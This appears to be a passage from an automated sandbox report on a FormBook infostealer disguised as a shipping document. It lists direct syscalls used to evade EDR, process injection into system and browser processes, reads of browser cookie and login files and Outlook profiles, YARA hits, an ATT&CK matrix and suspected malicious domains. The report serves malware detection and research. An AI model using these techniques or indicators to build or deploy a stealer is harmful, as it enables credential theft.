Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]	1_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]	1_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC810 mov eax, dword ptr fs:[00000030h]	1_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov ecx, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]	1_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h]	1_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]	1_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]	1_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03042840 mov ecx, dword ptr fs:[00000030h]	1_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060854 mov eax, dword ptr fs:[00000030h]	1_2_03060854

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_000F0B62

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000C2622
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000B083F
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B09D5 SetUnhandledExceptionFilter,	0_2_000B09D5
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_000B0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 6888

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 26FC008

Jump to behavior

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

0_2_000F1201

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000D2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_000D2BA5

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000FB226 SendInput,keybd_event,

0_2_000FB226

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_001122DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_001122DA

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe"	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

0_2_000F0B62

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000F1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_000F1663

Source: Shipping report#Cargo Handling.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Shipping report#Cargo Handling.exe, tfTpvPSAdwQ.exe, 00000005.00000000.2266343831.0000000001670000.00000002.00000001.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000005.00000002.3123325526.0000000001670000.00000002.00000001.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000007.00000002.3123606049.0000000000C30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: tfTpvPSAdwQ.exe, 00000005.00000000.2266343831.0000000001670000.00000002.00000001.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000005.00000002.3123325526.0000000001670000.00000002.00000001.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000007.00000002.3123606049.0000000000C30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: tfTpvPSAdwQ.exe, 00000005.00000000.2266343831.0000000001670000.00000002.00000001.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000005.00000002.3123325526.0000000001670000.00000002.00000001.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000007.00000002.3123606049.0000000000C30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: tfTpvPSAdwQ.exe, 00000005.00000000.2266343831.0000000001670000.00000002.00000001.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000005.00000002.3123325526.0000000001670000.00000002.00000001.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000007.00000002.3123606049.0000000000C30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000B0698 cpuid

0_2_000B0698

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_00108195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00108195

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000ED27A GetUserNameW,

0_2_000ED27A

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000CBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_000CBB6F

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000942DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.430000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Shipping report#Cargo Handling.exe	Binary or memory string: WIN_81
Source: Shipping report#Cargo Handling.exe	Binary or memory string: WIN_XP
Source: Shipping report#Cargo Handling.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Shipping report#Cargo Handling.exe	Binary or memory string: WIN_XPe
Source: Shipping report#Cargo Handling.exe	Binary or memory string: WIN_VISTA
Source: Shipping report#Cargo Handling.exe	Binary or memory string: WIN_7
Source: Shipping report#Cargo Handling.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.430000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00111204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00111204
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00111806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00111806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Shipping report#Cargo Handling.exe	55%	ReversingLabs	Win32.Trojan.Leonem
Shipping report#Cargo Handling.exe	35%	Virustotal		Browse
Shipping report#Cargo Handling.exe	100%	Avira	DR/AutoIt.Gen8
Shipping report#Cargo Handling.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.independent200.org	1%	Virustotal	Browse
chamadaslotgiris.net	3%	Virustotal	Browse
dns.ladipage.com	0%	Virustotal	Browse
tigre777gg.online	0%	Virustotal	Browse
www.mediaplug.biz	0%	Virustotal	Browse
www.chamadaslotgiris.net	2%	Virustotal	Browse
www.masteriocp.online	1%	Virustotal	Browse
www.tigre777gg.online	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
